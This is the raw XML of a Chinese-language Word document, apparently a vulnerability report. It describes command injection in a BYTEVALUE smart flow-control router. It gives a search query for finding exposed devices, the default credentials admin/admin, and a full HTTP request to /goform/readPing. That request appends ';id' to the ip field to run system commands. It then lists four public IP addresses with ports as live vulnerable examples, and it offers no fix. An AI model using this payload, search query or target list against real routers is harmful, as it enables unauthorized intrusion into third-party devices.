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6E324" w14:textId="77777777" w:rsidR="00C00ABA" w:rsidRDefault="00C00ABA" w:rsidP="00C00ABA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C00ABA">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>深圳市百为通达科技有限公司智能流控路由器存在命令执行漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B51A72" w14:textId="288F268E" w:rsidR="00C00ABA" w:rsidRDefault="00C00ABA" w:rsidP="00C00ABA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C00ABA">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>搜索语句：</w:t>
      </w:r>
      <w:r w:rsidRPr="00C00ABA">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>app="BYTEVALUE-智能流控路由器"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D43DD8" w14:textId="1EAB3877" w:rsidR="008A693B" w:rsidRPr="008A693B" w:rsidRDefault="008A693B" w:rsidP="008A693B">
      <w:pPr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A1DCE3" wp14:editId="59F4B68F">
            <wp:extent cx="5274310" cy="3469005"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="69152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D92" w14:textId="684E4801" w:rsidR="00C00ABA" w:rsidRDefault="00C00ABA" w:rsidP="00C00ABA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:num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复现步骤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A73EAA0" w14:textId="5E3B879B" w:rsidR="00C00ABA" w:rsidRDefault="00C00ABA" w:rsidP="00C00ABA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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使用默认口令admin/admin登入系统内部</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218DF6A3" w14:textId="4BB86094" w:rsidR="00C00ABA" w:rsidRDefault="00C00ABA" w:rsidP="00C00ABA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B5DF7B6" wp14:editId="47451CFE">
            <wp:extent cx="5274310" cy="2176780"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1332820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0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4A67" w14:textId="7D256484" w:rsidR="00C00ABA" w:rsidRDefault="00C00ABA" w:rsidP="00C00ABA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1E8E065B" wp14:editId="3CEFC968">
            <wp:extent cx="5274310" cy="2065655"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1496922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22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5EA6" w14:textId="0A612317" w:rsidR="00C00ABA" w:rsidRPr="00C00ABA" w:rsidRDefault="00C00ABA" w:rsidP="00C00ABA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C00ABA">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>设备维护功能处&gt;ping检测&gt;选择网口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B63EFD5" w14:textId="5C58070A" w:rsidR="00C00ABA" w:rsidRDefault="00C00ABA" w:rsidP="00C00ABA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3812E3A6" wp14:editId="65294A0D">
            <wp:extent cx="5274310" cy="4761230"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="399795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95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2AF" w14:textId="3374B4D6" w:rsidR="00C00ABA" w:rsidRDefault="00C00ABA" w:rsidP="005C4CA0">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C00ABA">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>点击开始进行抓包</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>修改</w:t>
      </w:r>
      <w:r w:rsidR="005C4CA0">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>参数IP增加;id即可执行系统命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CA2831" w14:textId="12B56AD0" w:rsidR="005C4CA0" w:rsidRDefault="005C4CA0" w:rsidP="005C4CA0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4CF7006" wp14:editId="58EE4B54">
            <wp:extent cx="5274310" cy="2185035"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="422500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0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C47E" w14:textId="77777777" w:rsidR="000A1E50" w:rsidRDefault="000A1E50" w:rsidP="005C4CA0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3236F09F" w14:textId="20852444" w:rsidR="000A1E50" w:rsidRDefault="000A1E50" w:rsidP="005C4CA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数据包如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B4F1DF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POST /goform/readPing HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AFC3D6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Host: 60.20.222.230:9090</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F8E20D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 xml:space="preserve">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) </w:t>
      </w:r>
      <w:r w:rsidRPr="000A1E50">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Gecko/20100101 Firefox/136.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5404E97C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Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7E0EF0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Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1005AD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Accept-Encoding: gzip, deflate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B67453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Content-Type: application/x-www-form-urlencoded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9949A7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Content-Length: 43</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAB59AC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Origin: http://60.20.222.230:9090</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249BD255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DNT: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E0DF39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Sec-GPC: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E0471A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Connection: close</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78148F87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Referer: http://60.20.222.230:9090/maint/sping.htm?v=20170403</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D31B23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Cookie: fsm_u=admin; fsm_login=21232f297a57a5a743894a0e4a801fc3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C4F98A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Upgrade-Insecure-Requests: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A5E539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Priority: u=4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02577721" w14:textId="77777777" w:rsidR="000A1E50" w:rsidRPr="000A1E50" w:rsidRDefault="000A1E50" w:rsidP="000A1E50">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B2E2DCC" w14:textId="7081E209" w:rsidR="000A1E50" w:rsidRDefault="000A1E50" w:rsidP="000A1E50">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A1E50">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>eth=60.20.222.230&amp;ip=60.20.216.1;id&amp;count=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1881F26B" w14:textId="77777777" w:rsidR="008A314C" w:rsidRDefault="008A314C" w:rsidP="000A1E50">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73827D3E" w14:textId="58883091" w:rsidR="008A314C" w:rsidRDefault="008A314C" w:rsidP="000A1E5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四、案例如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F21A0A" w14:textId="77777777" w:rsidR="008A314C" w:rsidRDefault="008A314C" w:rsidP="000A1E50">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50941E87" w14:textId="6E593698" w:rsidR="008A314C" w:rsidRPr="008A314C" w:rsidRDefault="008A314C" w:rsidP="008A314C">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="00555A75">
          <w:rPr>
            <w:rStyle w:val="af2"/>
            <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://60.20.222.230:9090</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4AD1213A" w14:textId="00B89F99" w:rsidR="008A314C" w:rsidRDefault="008A314C" w:rsidP="008A314C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5CF7045" wp14:editId="10F4C374">
            <wp:extent cx="5274310" cy="2214880"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="475792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92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4BAE" w14:textId="7287500E" w:rsidR="008A314C" w:rsidRPr="008A314C" w:rsidRDefault="008A314C" w:rsidP="008A314C">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="00555A75">
          <w:rPr>
            <w:rStyle w:val="af2"/>
            <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://120.69.221.54:2024</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2FCC149A" w14:textId="30D2C864" w:rsidR="008A314C" w:rsidRDefault="008A314C" w:rsidP="008A314C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E6119" wp14:editId="446A65DA">
            <wp:extent cx="5274310" cy="2198370"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="668310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0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27F0" w14:textId="77777777" w:rsidR="001B5BC7" w:rsidRDefault="001B5BC7" w:rsidP="008A314C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1143DB0C" w14:textId="1396DD8C" w:rsidR="001B5BC7" w:rsidRDefault="001B5BC7" w:rsidP="008A314C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3、</w:t>
      </w:r>
      <w:r w:rsidRPr="001B5BC7">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http://112.225.105.191:8081</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E6632A" w14:textId="673DD838" w:rsidR="001B5BC7" w:rsidRDefault="001B5BC7" w:rsidP="008A314C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A9CC53E" wp14:editId="602B1BE6">
            <wp:extent cx="5274310" cy="2217420"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1673766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66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5908" w14:textId="3FCB5603" w:rsidR="00C635C9" w:rsidRDefault="00C635C9" w:rsidP="008A314C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4、</w:t>
      </w:r>
      <w:r w:rsidR="00413B20" w:rsidRPr="00413B20">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http://112.54.139.27:2011</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC35285" w14:textId="4FFF67B6" w:rsidR="00C635C9" w:rsidRPr="008A314C" w:rsidRDefault="00C635C9" w:rsidP="008A314C">
      <w:pPr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143A911A" wp14:editId="1262588E">
            <wp:extent cx="5274310" cy="2113915"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="1149791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1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2075" w14:textId="77777777" w:rsidR="00C00ABA" w:rsidRPr="00C00ABA" w:rsidRDefault="00C00ABA" w:rsidP="00C00ABA">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00C00ABA" w:rsidRPr="00C00A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2D00C3" w14:textId="77777777" w:rsidR="00192B37" w:rsidRDefault="00192B37" w:rsidP="00C00ABA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0644A2C9" w14:textId="77777777" w:rsidR="00192B37" w:rsidRDefault="00192B37" w:rsidP="00C00AB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D6C97" w14:textId="77777777" w:rsidR="00192B37" w:rsidRDefault="00192B37" w:rsidP="00C00ABA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="746A2E70" w14:textId="77777777" w:rsidR="00192B37" w:rsidRDefault="00192B37" w:rsidP="00C00AB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3972"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FE2C74E4"/>
    <w:lvl w:ilvl="0" w:tplc="B9D6F6A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6664E61"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EF18047E"/>
    <w:lvl w:ilvl="0" w:tplc="AF945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E3B43E1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="085617F2"/>
    <w:lvl w:ilvl="0" w:tplc="0A0E34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3881878"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0A60729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1990270">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1587498225">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1501046054">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="963734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D6"/>
    <w:rsid w:val="000A1E50"/>
    <w:rsid w:val="001474D6"/>
    <w:rsid w:val="00192B37"/>
    <w:rsid w:val="001B5BC7"/>
    <w:rsid w:val="00413B20"/>
    <w:rsid w:val="005C4CA0"/>
    <w:rsid w:val="005F2915"/>
    <w:rsid w:val="006E2AD6"/>
    <w:rsid w:val="008A314C"/>
    <w:rsid w:val="008A693B"/>
    <w:rsid w:val="00C00ABA"/>
    <w:rsid w:val="00C23E31"/>
    <w:rsid w:val="00C6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6DCF51"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{116B9322-303A-4A30-B332-57035B07F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74D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74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4D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74D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4D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74D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74D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74D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74D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74D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474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47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474D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474D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474D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474D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474D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474D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474D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47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74D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474D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74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474D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74D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74D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74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474D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474D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00AB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00AB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00A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00ABA"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="af2">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C00ABA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C00A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60.20.222.230:9090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0.69.221.54:202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</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>kai</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-04-22T07:42:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-04-22T08:39:00Z</dcterms:modified>
</cp:coreProperties>
</file>